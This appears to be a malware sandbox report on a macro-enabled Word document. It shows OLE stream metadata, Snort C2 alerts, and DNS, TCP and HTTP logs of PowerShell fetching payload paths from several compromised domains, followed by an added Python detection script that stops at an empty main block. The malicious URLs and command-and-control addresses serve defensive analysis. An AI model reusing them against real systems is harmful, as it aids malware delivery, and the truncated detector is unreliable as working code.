                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      File Type:data
                                                                      Stream Size:146
                                                                      Entropy:4.00187355764
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      File Type:data
                                                                      Stream Size:4096
                                                                      Entropy:0.280441275353
                                                                      Base64 Encoded:False
                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 1536
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      File Type:data
                                                                      Stream Size:1536
                                                                      Entropy:7.89109371025
                                                                      Base64 Encoded:False
                                                                      Stream Path: 1Table, File Type: data, Stream Size: 6861
                                                                      General
                                                                      Stream Path:1Table
                                                                      File Type:data
                                                                      Stream Size:6861
                                                                      Entropy:6.02892947961
                                                                      Base64 Encoded:True
                                                                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517
                                                                      General
                                                                      Stream Path:Macros/PROJECT
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Stream Size:517
                                                                      Entropy:5.51044136587
                                                                      Base64 Encoded:True
                                                                      Data ASCII:I D = " { 2 1 D F 1 D 8 3 - D A C 6 - 4 F C E - A 9 4 D - 2 C 7 0 E C 4 6 E 1 7 0 } " . . D o c u m e n t = B c u r 5 6 9 9 z 4 d / & H 0 0 0 0 0 0 0 0 . . M o d u l e = X x u u 2 1 l 7 k i w b x w j _ 0 . . M o d u l e = N s t 6 o t v n m g m p w . . E x e N a m e 3 2 = " W 9 i 7 s t p l 0 2 4 v g x r " . . N a m e = " Q w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 F 8 D 9 9 E 4 A 7 6 C E A 7 0 E A 7 0 E A 7 0 E A 7 0 " . . D P
                                                                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 134
                                                                      General
                                                                      Stream Path:Macros/PROJECTwm
                                                                      File Type:data
                                                                      Stream Size:134
                                                                      Entropy:3.95084728485
                                                                      Base64 Encoded:False
                                                                      Data ASCII:B c u r 5 6 9 9 z 4 d . B . c . u . r . 5 . 6 . 9 . 9 . z . 4 . d . . . X x u u 2 1 l 7 k i w b x w j _ 0 . X . x . u . u . 2 . 1 . l . 7 . k . i . w . b . x . w . j . _ . 0 . . . N s t 6 o t v n m g m p w . N . s . t . 6 . o . t . v . n . m . g . m . p . w . . . . .
                                                                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5553
                                                                      General
                                                                      Stream Path:Macros/VBA/_VBA_PROJECT
                                                                      File Type:data
                                                                      Stream Size:5553
                                                                      Entropy:5.57459869251
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 672
                                                                      General
                                                                      Stream Path:Macros/VBA/dir
                                                                      File Type:data
                                                                      Stream Size:672
                                                                      Entropy:6.35085469527
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . Q 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . [ . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                                                      Stream Path: WordDocument, File Type: data, Stream Size: 113278
                                                                      General
                                                                      Stream Path:WordDocument
                                                                      File Type:data
                                                                      Stream Size:113278
                                                                      Entropy:7.3453177245
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 ad 5d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e ba 01 00 62 7f 00 00 62 7f 00 00 ad 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                      Network Behavior

                                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/27/21-12:17:35.820429 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 191.6.196.95 | 192.168.2.22
01/27/21-12:18:49.250556 | TCP | 2404344 | ET CNC Feodo Tracker Reported CnC Server TCP group 23 | 49175 | 80 | 192.168.2.22 | 84.232.229.24
01/27/21-12:18:57.070442 | TCP | 2404334 | ET CNC Feodo Tracker Reported CnC Server TCP group 18 | 49176 | 8080 | 192.168.2.22 | 51.255.203.164

                                                                      Network Port Distribution

                                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 27, 2021 12:17:35.289449930 CET | 49165 | 80 | 192.168.2.22 | 191.6.196.95
Jan 27, 2021 12:17:35.538330078 CET | 80 | 49165 | 191.6.196.95 | 192.168.2.22
Jan 27, 2021 12:17:35.538538933 CET | 49165 | 80 | 192.168.2.22 | 191.6.196.95
Jan 27, 2021 12:17:35.541695118 CET | 49165 | 80 | 192.168.2.22 | 191.6.196.95
Jan 27, 2021 12:17:35.788208008 CET | 80 | 49165 | 191.6.196.95 | 192.168.2.22
Jan 27, 2021 12:17:35.820429087 CET | 80 | 49165 | 191.6.196.95 | 192.168.2.22
Jan 27, 2021 12:17:36.017745018 CET | 49165 | 80 | 192.168.2.22 | 191.6.196.95
Jan 27, 2021 12:17:36.147525072 CET | 49166 | 80 | 192.168.2.22 | 75.103.81.81
Jan 27, 2021 12:17:36.328591108 CET | 80 | 49166 | 75.103.81.81 | 192.168.2.22
Jan 27, 2021 12:17:36.328808069 CET | 49166 | 80 | 192.168.2.22 | 75.103.81.81
Jan 27, 2021 12:17:36.329037905 CET | 49166 | 80 | 192.168.2.22 | 75.103.81.81
Jan 27, 2021 12:17:36.511939049 CET | 80 | 49166 | 75.103.81.81 | 192.168.2.22
Jan 27, 2021 12:17:36.515872955 CET | 80 | 49166 | 75.103.81.81 | 192.168.2.22
Jan 27, 2021 12:17:36.735344887 CET | 49166 | 80 | 192.168.2.22 | 75.103.81.81
Jan 27, 2021 12:17:36.996504068 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:37.249649048 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:37.249882936 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:37.264085054 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:37.515511990 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:37.519325018 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:37.519368887 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:37.519397974 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:37.519511938 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:37.532542944 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:37.786819935 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:37.998981953 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:39.505713940 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:39.758045912 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:39.761086941 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:39.984756947 CET | 49170 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.014055014 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:40.014097929 CET | 443 | 49167 | 177.12.170.95 | 192.168.2.22
Jan 27, 2021 12:17:40.014251947 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:40.014307022 CET | 49167 | 443 | 192.168.2.22 | 177.12.170.95
Jan 27, 2021 12:17:40.193675995 CET | 443 | 49170 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.197443962 CET | 49170 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.198034048 CET | 49170 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.404860020 CET | 443 | 49170 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.404910088 CET | 443 | 49170 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.404938936 CET | 443 | 49170 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.404967070 CET | 443 | 49170 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.405049086 CET | 49170 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.412507057 CET | 49170 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.413486004 CET | 49171 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.615835905 CET | 443 | 49171 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.616157055 CET | 49171 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.617010117 CET | 49171 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.619255066 CET | 443 | 49170 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.819360018 CET | 443 | 49171 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.819415092 CET | 443 | 49171 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.819436073 CET | 443 | 49171 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.819464922 CET | 443 | 49171 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:40.819740057 CET | 49171 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:40.822115898 CET | 80 | 49165 | 191.6.196.95 | 192.168.2.22
Jan 27, 2021 12:17:40.822310925 CET | 49165 | 80 | 192.168.2.22 | 191.6.196.95
Jan 27, 2021 12:17:40.823407888 CET | 49171 | 443 | 192.168.2.22 | 104.168.154.203
Jan 27, 2021 12:17:41.015614033 CET | 49172 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.025521040 CET | 443 | 49171 | 104.168.154.203 | 192.168.2.22
Jan 27, 2021 12:17:41.167398930 CET | 443 | 49172 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.167530060 CET | 49172 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.168284893 CET | 49172 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.321968079 CET | 443 | 49172 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.322031021 CET | 443 | 49172 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.322047949 CET | 443 | 49172 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.322351933 CET | 49172 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.324588060 CET | 49172 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.325530052 CET | 49173 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.476396084 CET | 443 | 49172 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.478358030 CET | 443 | 49173 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.478549957 CET | 49173 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.479553938 CET | 49173 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.521337986 CET | 80 | 49166 | 75.103.81.81 | 192.168.2.22
Jan 27, 2021 12:17:41.521637917 CET | 49166 | 80 | 192.168.2.22 | 75.103.81.81
Jan 27, 2021 12:17:41.632101059 CET | 443 | 49173 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.632145882 CET | 443 | 49173 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.632209063 CET | 443 | 49173 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.632340908 CET | 49173 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.636425972 CET | 49173 | 443 | 192.168.2.22 | 35.209.96.32
Jan 27, 2021 12:17:41.728960991 CET | 49174 | 443 | 192.168.2.22 | 35.163.191.195
Jan 27, 2021 12:17:41.788908958 CET | 443 | 49173 | 35.209.96.32 | 192.168.2.22
Jan 27, 2021 12:17:41.930414915 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:41.930558920 CET | 49174 | 443 | 192.168.2.22 | 35.163.191.195
Jan 27, 2021 12:17:41.931462049 CET | 49174 | 443 | 192.168.2.22 | 35.163.191.195
Jan 27, 2021 12:17:42.132985115 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.133199930 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.133224010 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.133238077 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.133246899 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.133414984 CET | 49174 | 443 | 192.168.2.22 | 35.163.191.195
Jan 27, 2021 12:17:42.134701967 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.134721994 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.134824038 CET | 49174 | 443 | 192.168.2.22 | 35.163.191.195
Jan 27, 2021 12:17:42.150039911 CET | 49174 | 443 | 192.168.2.22 | 35.163.191.195
Jan 27, 2021 12:17:42.421269894 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.454632044 CET | 49174 | 443 | 192.168.2.22 | 35.163.191.195
Jan 27, 2021 12:17:42.725614071 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.725673914 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.725712061 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.725749969 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22
Jan 27, 2021 12:17:42.725789070 CET | 443 | 49174 | 35.163.191.195 | 192.168.2.22

                                                                      UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 27, 2021 12:17:34.783607006 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:35.270771980 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:35.839396954 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:36.146183968 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:36.524178982 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:36.995876074 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:38.050385952 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:38.098505974 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:38.105164051 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:38.153475046 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:38.695741892 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:38.756236076 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:38.759830952 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:38.816346884 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:39.773932934 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:39.983139992 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:40.848473072 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:41.014501095 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Jan 27, 2021 12:17:41.667201042 CET | 52496 | 53 | 192.168.2.22 | 8.8.8.8
Jan 27, 2021 12:17:41.727834940 CET | 53 | 52496 | 8.8.8.8 | 192.168.2.22

                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 27, 2021 12:17:34.783607006 CET | 192.168.2.22 | 8.8.8.8 | 0x82b3 | Standard query (0) | riandutra.com | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:35.839396954 CET | 192.168.2.22 | 8.8.8.8 | 0xe9da | Standard query (0) | calledtochange.org | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:36.524178982 CET | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | mrveggy.com | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:39.773932934 CET | 192.168.2.22 | 8.8.8.8 | 0x21e1 | Standard query (0) | norailya.com | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:40.848473072 CET | 192.168.2.22 | 8.8.8.8 | 0x9f83 | Standard query (0) | hbprivileged.com | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:41.667201042 CET | 192.168.2.22 | 8.8.8.8 | 0x868 | Standard query (0) | ummahstars.com | A (IP address) | IN (0x0001)

                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 27, 2021 12:17:35.270771980 CET | 8.8.8.8 | 192.168.2.22 | 0x82b3 | No error (0) | riandutra.com | (none) | 191.6.196.95 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:36.146183968 CET | 8.8.8.8 | 192.168.2.22 | 0xe9da | No error (0) | calledtochange.org | (none) | 75.103.81.81 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:36.995876074 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | mrveggy.com | (none) | 177.12.170.95 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:39.983139992 CET | 8.8.8.8 | 192.168.2.22 | 0x21e1 | No error (0) | norailya.com | (none) | 104.168.154.203 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:41.014501095 CET | 8.8.8.8 | 192.168.2.22 | 0x9f83 | No error (0) | hbprivileged.com | (none) | 35.209.96.32 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:41.727834940 CET | 8.8.8.8 | 192.168.2.22 | 0x868 | No error (0) | ummahstars.com | (none) | 35.163.191.195 | A (IP address) | IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • riandutra.com
                                                                      • calledtochange.org

                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 191.6.196.95 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 12:17:35.541695118 CET | 0 | OUT | GET /email/AfhE8z0/ HTTP/1.1
                                                                      Host: riandutra.com
                                                                      Connection: Keep-Alive
Jan 27, 2021 12:17:35.820429087 CET | 1 | IN | HTTP/1.1 403 Forbidden
                                                                      Date: Wed, 27 Jan 2021 11:17:35 GMT
                                                                      Server: Apache
                                                                      Content-Length: 404
                                                                      Keep-Alive: timeout=5, max=500
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 65 6d 61 69 6c 2f 41 66 68 45 38 7a 30 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /email/AfhE8z0/on this server.<br />Server unable to read htaccess file, denying access to be safe</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 75.103.81.81 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 12:17:36.329037905 CET | 1 | OUT | GET /CalledtoChange/8huSOd/ HTTP/1.1
                                                                      Host: calledtochange.org
                                                                      Connection: Keep-Alive
Jan 27, 2021 12:17:36.515872955 CET | 2 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Jan 2021 11:17:36 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
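The DNS, TCP and HTTP tables above show one process (powershell.exe) resolving six unrelated domains and opening a connection to each within about six seconds, moving on after the first site answers 403 and the second 404. The block below is an added example, not part of the Joe Sandbox report, that correlates rows constructed from those tables and flags the walk as a downloader fall-through. The 10-second window and the four-domain threshold are assumptions chosen to fit this report, not tuned values; the timestamps are the report's, truncated to microseconds.

```python
from datetime import datetime, timedelta

# Rows constructed from this report's DNS Answers, TCP Packets and HTTP Packets
# tables. Timestamps are the report's, truncated to microseconds for strptime.
DNS_ANSWERS = [  # (answer time, name, A record)
    ("12:17:35.270771", "riandutra.com", "191.6.196.95"),
    ("12:17:36.146183", "calledtochange.org", "75.103.81.81"),
    ("12:17:36.995876", "mrveggy.com", "177.12.170.95"),
    ("12:17:39.983139", "norailya.com", "104.168.154.203"),
    ("12:17:41.014501", "hbprivileged.com", "35.209.96.32"),
    ("12:17:41.727834", "ummahstars.com", "35.163.191.195"),
]
TCP_CONNECTS = [  # first packet of each new client port: (time, dst ip, dst port)
    ("12:17:35.289449", "191.6.196.95", 80),
    ("12:17:36.147525", "75.103.81.81", 80),
    ("12:17:36.996504", "177.12.170.95", 443),
    ("12:17:39.984756", "104.168.154.203", 443),
    ("12:17:41.015614", "35.209.96.32", 443),
    ("12:17:41.728960", "35.163.191.195", 443),
]
HTTP_RESPONSES = {  # only the two cleartext sessions expose a request and a status
    ("191.6.196.95", 80): ("GET /email/AfhE8z0/", 403),
    ("75.103.81.81", 80): ("GET /CalledtoChange/8huSOd/", 404),
}


def _t(stamp):
    return datetime.strptime(stamp, "%H:%M:%S.%f")


def correlate(dns_answers, tcp_connects, http_responses):
    """Attach to each outbound connect the name most recently resolved to its
    destination IP, plus the request and status when the session was cleartext."""
    chain = []
    for stamp, ip, port in tcp_connects:
        when = _t(stamp)
        seen = [(_t(a_stamp), name) for a_stamp, name, a_ip in dns_answers
                if a_ip == ip and _t(a_stamp) <= when]
        domain = max(seen)[1] if seen else None   # latest answer wins
        path, status = http_responses.get((ip, port), (None, None))
        chain.append({"time": when, "domain": domain, "ip": ip, "port": port,
                      "path": path, "status": status})
    return chain


def fallthrough_alert(chain, window=timedelta(seconds=10), min_domains=4):
    """Flag a downloader that walks several unrelated domains in quick succession,
    moving on after each non-2xx answer. Window and threshold are assumptions."""
    for i, first in enumerate(chain):
        burst = [e for e in chain[i:] if e["time"] - first["time"] <= window]
        domains = {e["domain"] for e in burst if e["domain"]}
        if len(domains) < min_domains:
            continue
        failed = [(e["domain"], e["status"]) for e in burst
                  if e["status"] is not None and not 200 <= e["status"] < 300]
        return {"start": first["time"].strftime("%H:%M:%S.%f"),
                "domains": sorted(domains), "failed_cleartext": failed}
    return None


if __name__ == "__main__":
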